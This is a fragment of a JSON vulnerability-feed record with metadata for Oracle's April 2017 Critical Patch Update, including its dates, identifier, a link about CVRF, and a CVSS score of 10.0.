More information about Oracle's use of CVRF is available [here](<http://www.oracle.com/technetwork/topics/security/cpufaq-098434.html#CVRF>).\n", "modified": "2017-06-20T00:00:00", "published": "2017-04-18T00:00:00", "id": "ORACLE:CPUAPR2017-3236618", "href": "", "title": "Oracle Critical Patch Update - April 2017", "type": "oracle", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}